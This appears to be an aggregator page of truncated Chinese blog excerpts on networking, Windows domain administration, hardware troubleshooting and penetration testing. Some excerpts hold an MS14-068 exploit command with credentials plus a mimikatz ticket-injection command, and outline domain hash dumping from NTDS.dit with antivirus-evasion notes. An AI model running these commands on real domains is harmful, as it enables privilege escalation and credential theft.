OSPF域内路由故障-现象与排障思路 一.故障现象 OSPF的或内路由故障常表现为邻居路由器不通告部分或全部路由,可能的原因通常为: 1).拟通告的接口上未启用OSPF 2).拟通告的接口被关闭 OSPF是一种基于链路状态的内部网关路由协议,存在链路状态数据库,在运行了OSPF的路由中需要重点关注邻居表.链路状态数据库(也叫链路状态表).路由表.如果邻居不通告某条路由,那么这条路由将无法显示在本地路由器的路由表和OSPF链路状态数据库中.同时, 这也表示邻居没有把这条路由包含到它自己的OSPF链…
原创地址:http://www.cnblogs.com/jfzhu/p/4022999.html 转载请注明出处 AD域内需要有DNS服务器,用于解析域内的计算机名,但是域内的计算如何解析公网的域名呢?当然一种方式是将域内每台计算机都额外添加一个公共DNS服务器:另外一种比较简便的方法就是在域内DNS服务器上增加一个转发器(Forwarder). 演示环境使用的是Windows 2008,两台计算机在同一域内,一台是DNS服务器,另一台是其他用途的计算机,下面演示如何设置DNS服务器,使得另一台…
Given a start IP address ip and a number of ips we need to cover n, return a representation of the range as a list (of smallest possible length) of CIDR blocks. A CIDR block is a string consisting of an IP, followed by a slash, and then the prefix le…
今天收录俩个比较低级的错误. 故障现象:   水冷排风扇高速运转, 并无法调控. 现在CPU散热的水冷排都设计了三条线,   温控4Pin , 水泵线 3Pin  , 接在机箱上USB口取电的灯线或者水泵辅助线. 这里提供了比较流行的 NXZT (国内译名: 恩杰) 的说明书截图, 很多时候都会理所当然的乱接, 但这里面是有学问的. 水泵线是3Pin的,只有正负极, 直接接在主板的 4pin水泵取电位置 . CPU温控线是4PIN的 接在主板上的4PIn取电处. 故障现象:  机箱的面板电源灯…
 可以让任何域内用户提升为域管理员     c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.localmimikatz.exe "kerberos::ptc TGT_k8test3@k8.local.ccache" exit       ms14-068.py Exploits…
ftp客户连接常见故障现象现象0:> ftp: connect :连接被拒绝原因: 服务没启动解决: # chkconfig vsftpd on<Enter> 现象1:500 OOPS: cannot open user list file原因: 不存在文件“/etc/vsftpd.user_list”或文件中不存在该帐户解决: # echo username >> /etc/vsftpd.user_list<Enter> 现象2:530 Permission d…
开始,网络的制定者将网络划分为A,B,C三种网络,想这个样子: A类网:  xxx.0.0.0         子网掩码:255.0.0.0 xxx.0.0.0/8 //后面的数字代表网络地址的字段 B类网:  xxx.xxx.0.0      子网掩码:255.255.0.0   xxx.xxx.0.0/16 C类网:  xxx.xxx.xxx.0  子网掩码:255.255.255.0     xxx.xxx.xxx.0/24 A类网255*255*255=16581375个地址,1千6百多…
0x00目标: 导出当前域内所有用户的hash 0x01测试环境: 域控:server2008 r2 杀毒软件:已安装* 域控权限:可使用net use远程登陆,不使用3389 0x02测试方法: (1)mimikatz: hash数量:只能抓取登陆过的用户hash,无法抓取所有用户 免杀:需要免杀 (2)pwdump: hash数量:无法抓取所有用户 免杀:需要免杀 (3)vssown.vbs + libesedb + NtdsXtract hash数量:所有用户 免杀:不需要 优点: 获得信…
0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票.银票是一张tgs,也就是一张服务票据.服务票据是客户端直接发送给服务器,并请求服务资源的.如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器.所以ms14-068的来源和银票是息息相关的. 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许域内任何一个普通用户,将自己提升至域管权限.微软给出的补丁是kb3011780.在server 2000以上的…
本文转自先知社区,原文链接:https://xz.aliyun.com/t/2527#toc-10 原文地址:https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes <h1>在渗透测试的过程中,当我们已经是域管权限时,就可以实现提取所有域内用户的密码哈希以进行离线破解和分析,这是非常常见的一个操作.这些哈希值存储在域控制器(NTDS.DIT​​)中的数据库文件中,并带有一些其他信息,如组中成员身份和用户.</h1…